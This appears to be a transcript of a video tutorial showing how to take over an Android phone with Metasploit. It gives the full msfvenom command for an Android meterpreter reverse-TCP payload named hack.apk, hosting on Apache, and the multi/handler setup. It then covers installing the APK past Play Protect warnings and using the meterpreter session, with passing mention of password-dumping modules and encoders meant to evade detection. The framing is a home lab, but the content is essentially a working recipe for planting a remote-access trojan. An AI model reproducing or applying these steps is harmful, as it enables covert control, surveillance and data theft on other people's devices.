Hello buddy and welcome back to my channel. Today, access this Android device with Metasploit framework. Let's start how to access this Android device with Metasploit. So first step, we create a payload for Android device. Use msfvenom. Now open your terminal. The payload we are going to create with msfvenom is a reverse TCP payload for Android. Follow this command. Simply type msfvenom -p. P indicate here payload type. The payload type is Android. So Android meterpreter reverse TCP and set a localhost IP address is. Open your terminal and simply type sudo if config kali password. Sorry. This is my IP address of localhost machine 192.168.225.146. Now copy this IP. Now paste here and set a listening port. It's set 4444 and now dash O indicate here output of the file. The name of the file is hack.apk file. .apk file for Android, and we make a payload for also Windows and Linux and Firefox and more and also. So now we create a payload for Android device. So output of the file is hack.apk. This payload generate an .apk file which when run connect from the victim machine to our Metasploit handler, giving us a meterpreter session. So now it's take time and 10 to 15 seconds at least. Basically, msfvenom is used to make a payload to penetrate the Android and Windows and Linux and more and also etc. So now we see the payload hack.apk is created. Now let's move to this payload in HTML Apache server. So now let's move. I follow this command sudo move hack.apk in where folder html. Now hit enter. Enter your curly password. Yeah, it's move. Now let's see and move to where. Let's check my hack.apk file is moved in HTML folder or not. Yeah, here you see the hack.apk file is moved in html folder. So now let's move to home directory. Type simple command cd. Now let's start Apache server. Follow this command sudo service Apache 2 starts. Yeah, Apache server is start. Now let's check Apache server starts or not. To type follow this command sudo service Apache 2 status. So here you see Apache service is start active running. So now open your next terminal. Payload is created and Apache service is started. Now let's move to MSF console is Metasploit framework. Metasploit framework is a penetration testing tool is an exploitation framework to give us access in your system and multi-modules available in the Metasploit. MSF console, follow this command msf console and hit enter. Restarting the Metasploit framework here. Yeah, it's open. You see about the exploit. 2045 exploit are available. Exploit tools used to take advantage of system weakness, and about 1106 auxiliaries is a supplementary tool and a commands, and about 344 post modules. Post modules are what you do after you got access to the system. So for example, there are modules that can search for passwords for you, and there are modules that can get you from one system to another one. There are also modules that can dump browser passwords, system passwords, and stuff like that. So, and here you see the 562 payloads are available. Payloads help to create a malicious files to get access on your target. And here the 45 encoders are available. Encoders to make malicious code undetectable. It used to convert code or information. And now, and 10 noobs are available. Noobs as an instruction to keep the payload from crashing. And 7 evasions access Android device. First, follow this command. Use multi-handler and hit enter. Yeah. Through multi-handler exploiter using configured payload to set payload for Android. Reverse TCP. Here the payload is set now. So options. Here the modules options. Payload is set. Android meterpreter reverse TCP. Now set a LHOST. L is a local host, local IP address. Now set local IP address, listen address. So set, follow this command, set LHOST and your localhost IP address 192.168.225.146. Set localhost IP address. This is my localhost IP address. Set, yeah, and now so options. Yeah, the LHOST is set in my multi-handler. Now let's move to share a payload. Open your any browser. Localhost IP address 192.168.225.146 and forward slash and name of the payload, the hack.apk, and yeah, the hack.apk file download. Hack.apk file is downloaded in my system. For your security, your phone is not allowed to install unknown app for this source. To give a permission to install an unknown app, to go to setting, yeah, allow unknown app and back and install the main.activity hack.apk file. Yeah, installing process. It is blocked by the play protect. So ignore this message and install anyway. Yeah, app is installed. Yeah, done. And now ignore this message. Here you see the main.activity file. Hack.apk file is downloaded in my Android device. Now let's this time to access this Android device. with Metasploit framework. So do and follow this command, uh, exploits, and hit enter. Here you see the start reverse TCP handler on 192.168.225.146. Now this time to double tap to main.activity file, and it asks you permission to give a permission continue, and now click one time. Here you see now in my current Linux system terminal open meterpreter session. Now I have a full control over this Android device. So type our first command is help. Help is here you to what you want to do in this Android device. Sysinfo, get information about the remote system, screenshots, a lot of function, a lot of command to use to access Android device. So type I want to just show you sysinfo and hit enter. Here you see the computer, localhost operating system is Android 10 and Linux 4.9. Architecture 64 meterpreter session is open the Delvic Android. Now here the application controller command is also available. You request to install APK file, use this command app install, or and this is the app list command. This is the list install app in this device. In this Android device, whatever we download in this Android device, it show you this is the information. Now let's move, and after this Metasploit, to type this command background. Now you move to the multi-handler. Now here this meterpreter session is running in your system in background way. Now let's do how to see this. So test session test I and hit enter. Oh, unknown command, sorry. Sessions here. The meterpreter develop session. This is the Android device. In this Android device use this. So how to use this to set an ID of the name that hit enter. Yes, the meterpreter session is open in your system to sys info. Yeah. Yeah, this is a complete how to access Android device with Metasploit framework. Okay, thank you.